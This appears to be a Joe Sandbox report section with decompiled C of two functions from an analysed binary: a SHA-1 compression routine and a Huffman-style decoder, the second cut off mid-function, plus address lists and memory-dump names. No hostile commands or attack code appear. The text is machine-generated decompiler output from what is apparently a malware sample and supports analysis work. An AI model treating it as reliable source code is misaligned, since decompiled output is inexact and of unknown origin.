Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5a6ee81230f9964c2b7d886b5441bde9d52927ebfacf8b9927f48809ae3912
Instruction ID: 561bf861256d809bf191115c8f0a1bba23d6212f9c2953a677259a85dab780ad
Opcode Fuzzy Hash: fd5a6ee81230f9964c2b7d886b5441bde9d52927ebfacf8b9927f48809ae3912
Instruction Fuzzy Hash: 836222706487869FC719CF28C8805F9FBE1FB95304F1486AED8968B742DBB0E955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEC54 Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00BAEC54(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v40;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E00BBF300(_t839, _a12, 0x40);
					_t906 =  &(( &_v40)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_v24 = _t848[2];
				_v28 = _t848[3];
				_v36 = 0;
				_t429 = E00BC5EC4( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_v32 =  &(_t839[3]);
				do {
					_t431 = E00BC5EC4(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t431;
					_t436 = E00BC5EC4( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t436;
					asm("ror esi, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _v28 + _t436;
					_t441 = E00BC5EC4( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t441;
					asm("ror dword [esp+0x28], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _v28 ^ _t593) + _v24 + 0x5a827999 + _t441;
					_t443 = E00BC5EC4( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t443;
					_t446 = _v36 + 5;
					asm("ror dword [esp+0x30], 0x2");
					_v36 = _t446;
					_t593 = _t593 + ((_t851 ^ _v28) & _v24 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00BC5EC4(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t448;
				} while (_v36 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t769 + _v28 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_v40 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _v24 + 0x5a827999;
				asm("ror esi, 0x2");
				_v32 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _v40 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _v40;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_v40 = _t887;
				_t888 = _v32;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_v36 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_v32 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_v40 ^ _v32 ^ _t891) + 0x6ed9eba1 + _v36 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _v36;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v36 = _t855;
					_t489 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v32 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _v36) + _v40 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _v40;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _v36) + _v32 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _v32;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_v32 = _t894;
					_v36 = _v36 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _v36 - 0x70e44324 + ((_v32 | _v28) & _t598 | _v32 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _v36;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v36 = _t842;
					_t811 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v28 | _t842) & _v32 | _v28 & _t842) + _t867 + _v40;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _v40 + 0x8f1bbcdc + ((_t897 | _v36) & _v28 | _t897 & _v36) + _t871 + _v32;
					_v24 = _t897;
					_t898 = _v20;
					_v32 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _v40;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _v36 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _v32;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_v32 = _t899;
					_t858 = _v4;
					_v36 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _v36;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_v40 ^ _v32 ^ _t902) + _t820 + _t845 + _v36 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _v36;
					asm("rol ecx, 0x5");
					_v40 = (_v32 ^ _v28 ^ _t882) + _t825 + _v40 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_v36 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_v32 = (_t604 ^ _v28 ^ _v36) + _t830 + _v32 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v28 = (_t845 ^ _v40 ^ _v36) + _t834 + _v28 + _v32 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _v32;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _v40;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_v32 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _v36;
					_v16 = _t816;
					_v36 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}

0x00baec54
0x00baec60
0x00baec6c
0x00baec76
0x00baec7b
0x00baec80
0x00baec62
0x00baec62
0x00baec66
0x00baec66
0x00baec83
0x00baec8c
0x00baec8e
0x00baec91
0x00baec9b
0x00baeca1
0x00baeca5
0x00baecbd
0x00baecc8
0x00baecca
0x00baeccc
0x00baecd1
0x00baecd4
0x00baecd8
0x00baecdc
0x00baecdf
0x00baecea
0x00baecef
0x00baed09
0x00baed0e
0x00baed19
0x00baed26
0x00baed2b
0x00baed3f
0x00baed46
0x00baed50
0x00baed5d
0x00baed66
0x00baed76
0x00baed82
0x00baed84
0x00baed8f
0x00baed94
0x00baed97
0x00baedab
0x00baedb2
0x00baedb9
0x00baedc2
0x00baedc6
0x00baedca
0x00baedd5
0x00baedd8
0x00baeddb
0x00baede7
0x00baedf9
0x00baedfc
0x00baedfe
0x00baee14
0x00baee1c
0x00baee20
0x00baee2b
0x00baee3d
0x00baee44
0x00baee47
0x00baee4d
0x00baee4f
0x00baee54
0x00baee59
0x00baee6f
0x00baee78
0x00baee7a
0x00baee7d
0x00baee83
0x00baee89
0x00baee98
0x00baeea8
0x00baeeaa
0x00baeeb0
0x00baeeb2
0x00baeeb8
0x00baeebd
0x00baeec1
0x00baeec7
0x00baeecb
0x00baeed5
0x00baeedc
0x00baeee1
0x00baeee2
0x00baeee6
0x00baeeea
0x00baeeee
0x00baeeee
0x00baeeee
0x00baeef3
0x00baeef7
0x00baeeff
0x00baef05
0x00baef08
0x00baef0b
0x00baef1a
0x00baef29
0x00baef2b
0x00baef2e
0x00baef34
0x00baef3e
0x00baef43
0x00baef49
0x00baef4d
0x00baef51
0x00baef55
0x00baef59
0x00baef5e
0x00baef71
0x00baef80
0x00baef82
0x00baef85
0x00baef8b
0x00baef90
0x00baefa3
0x00baefa9
0x00baefad
0x00baefbd
0x00baefc6
0x00baefd0
0x00baefd3
0x00baefd5
0x00baefdc
0x00baefe2
0x00baeff1
0x00baeffe
0x00baf004
0x00baf00c
0x00baf02d
0x00baf030
0x00baf037
0x00baf03b
0x00baf03e
0x00baf048
0x00baf058
0x00baf05d
0x00baf065
0x00baf07c
0x00baf083
0x00baf087
0x00baf089
0x00baf08c
0x00baf092
0x00baf09b
0x00baf0ab
0x00baf0b0
0x00baf0b7
0x00baf0bb
0x00baf0bf
0x00baf0ca
0x00baf0cb
0x00baf0d5
0x00baf0d5
0x00baf0d5
0x00baf0d8
0x00baf0db
0x00baf0e2
0x00baf0e7
0x00baf0ec
0x00baf0f3
0x00baf101
0x00baf110
0x00baf112
0x00baf118
0x00baf127
0x00baf12a
0x00baf12d
0x00baf12e
0x00baf13a
0x00baf13e
0x00baf148
0x00baf14a
0x00baf151
0x00baf161
0x00baf16a
0x00baf16c
0x00baf16f
0x00baf183
0x00baf18a
0x00baf18d
0x00baf197
0x00baf19d
0x00baf1a1
0x00baf1b1
0x00baf1c0
0x00baf1c3
0x00baf1c5
0x00baf1c8
0x00baf1ec
0x00baf1f5
0x00baf1f8
0x00baf1fa
0x00baf1fe
0x00baf208
0x00baf20f
0x00baf225
0x00baf22f
0x00baf231
0x00baf235
0x00baf243
0x00baf252
0x00baf25a
0x00baf25f
0x00baf266
0x00baf27f
0x00baf285
0x00baf287
0x00baf28b
0x00baf291
0x00baf299
0x00baf29e
0x00baf2ae
0x00baf2b4
0x00baf2b8
0x00baf2c2
0x00000000
0x00000000
0x00baf0d1
0x00baf0d1
0x00baf2ca
0x00baf2cb
0x00baf2cf
0x00baf2cf
0x00baf2cf
0x00baf2d4
0x00baf2d8
0x00baf2dd
0x00baf2e2
0x00baf2e7
0x00baf2e9
0x00baf2eb
0x00baf2ef
0x00baf2fe
0x00baf30d
0x00baf30f
0x00baf312
0x00baf31a
0x00baf31f
0x00baf328
0x00baf32e
0x00baf332
0x00baf336
0x00baf33d
0x00baf33f
0x00baf352
0x00baf361
0x00baf363
0x00baf366
0x00baf36e
0x00baf381
0x00baf385
0x00baf389
0x00baf38c
0x00baf39c
0x00baf3a5
0x00baf3af
0x00baf3b2
0x00baf3b4
0x00baf3bb
0x00baf3bf
0x00baf3d4
0x00baf3dd
0x00baf3e1
0x00baf3e5
0x00baf40a
0x00baf413
0x00baf416
0x00baf418
0x00baf41b
0x00baf429
0x00baf436
0x00baf453
0x00baf456
0x00baf45a
0x00baf45c
0x00baf45f
0x00baf465
0x00baf46d
0x00baf476
0x00baf47a
0x00baf483
0x00baf487
0x00baf489
0x00baf490
0x00baf494
0x00baf49d
0x00baf4a1
0x00baf4a4
0x00baf4a7
0x00baf4aa
0x00baf4ac
0x00baf4b6

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8dcf4ce7443567a3df9829512a6481c5c28437b96de24cb6201d7f4281e1479
Instruction ID: b81640e7ca6820eafebcad16d40192ecdeeb97707e18ac53b0bdc99d96609aa1
Opcode Fuzzy Hash: a8dcf4ce7443567a3df9829512a6481c5c28437b96de24cb6201d7f4281e1479
Instruction Fuzzy Hash: E1523BB26087018FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA59CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00BB69EB Relevance: .5, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00BB69EB(signed int __ecx) {
				void* __ebp;
				signed int _t201;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				unsigned int _t223;
				signed int _t233;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				signed short _t246;
				signed int _t247;
				signed int _t250;
				signed int* _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t264;
				signed short _t265;
				unsigned int _t269;
				unsigned int _t274;
				signed int _t279;
				signed short _t280;
				signed int _t284;
				void* _t291;
				signed int _t293;
				signed int* _t295;
				signed int _t296;
				signed int _t297;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t313;
				intOrPtr _t314;
				signed int _t315;
				unsigned int _t318;
				void* _t320;
				signed int _t323;
				signed int _t324;
				unsigned int _t327;
				void* _t329;
				signed int _t332;
				void* _t335;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				void* _t342;
				signed int _t345;
				signed int* _t349;
				signed int _t350;
				unsigned int _t354;
				void* _t356;
				signed int _t359;
				void* _t363;
				signed int _t366;
				signed int _t367;
				unsigned int _t370;
				void* _t372;
				signed int _t375;
				intOrPtr* _t377;
				void* _t378;
				signed int _t381;
				void* _t384;
				signed int _t388;
				signed int _t389;
				intOrPtr* _t391;
				void* _t392;
				signed int _t395;
				void* _t398;
				signed int _t401;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				signed int _t414;
				unsigned int _t416;
				unsigned int _t420;
				signed int _t423;
				signed int _t424;
				unsigned int _t426;
				unsigned int _t430;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t436;
				intOrPtr* _t438;
				signed char _t440;
				signed int _t442;
				intOrPtr _t443;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t455;

				_t440 =  *(_t455 + 0x38);
				 *(_t455 + 0x18) = __ecx;
				if( *((char*)(_t440 + 0x2c)) != 0) {
					L3:
					_t313 =  *((intOrPtr*)(_t440 + 0x18));
					_t438 = _t440 + 4;
					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
						 *(_t455 + 0x18) = _t201;
						 *(_t455 + 0x14) = _t414;
						_t293 = _t201;
						__eflags = _t201 - _t414;
						if(_t201 >= _t414) {
							_t293 = _t414;
						}
						 *(_t455 + 0x10) = _t293;
						while(1) {
							_t314 =  *_t438;
							__eflags = _t314 - _t293;
							if(_t314 < _t293) {
								goto L15;
							}
							L9:
							__eflags = _t314 - _t201;
							if(__eflags > 0) {
								L93:
								L94:
								return _t201;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t314 - _t414;
								if(_t314 < _t414) {
									L14:
									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
										L92:
										 *((char*)(_t440 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t440 + 0x4ad2));
								if( *((char*)(_t440 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t201 =  *(_t440 + 8);
							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t315 =  *(_t440 + 0x4adc);
							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
							if( *(_t440 + 0x4ad8) > _t315 - 8) {
								_t284 = _t315 + _t315;
								 *(_t440 + 0x4adc) = _t284;
								_push(_t284 * 0xc);
								_push( *(_t440 + 0x4ad4));
								_t310 = E00BC341E(_t315, _t414);
								__eflags = _t310;
								if(_t310 == 0) {
									E00BA6E92(0xbdff50);
								}
								 *(_t440 + 0x4ad4) = _t310;
							}
							_t203 =  *(_t440 + 0x4ad8);
							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
							 *(_t455 + 0x28) = _t295;
							 *(_t440 + 0x4ad8) = _t203 + 1;
							_t205 = E00BAA740(_t438);
							_t206 =  *(_t440 + 0xb4);
							_t416 = _t205 & 0x0000fffe;
							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
								_t442 = 0xf;
								_t207 = _t206 + 1;
								__eflags = _t207 - _t442;
								if(_t207 >= _t442) {
									L27:
									_t318 =  *(_t438 + 4) + _t442;
									 *(_t438 + 4) = _t318 & 0x00000007;
									_t209 = _t318 >> 3;
									 *_t438 =  *_t438 + _t209;
									_t320 = 0x10;
									_t443 =  *((intOrPtr*)(_t455 + 0x20));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E00BAA740(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
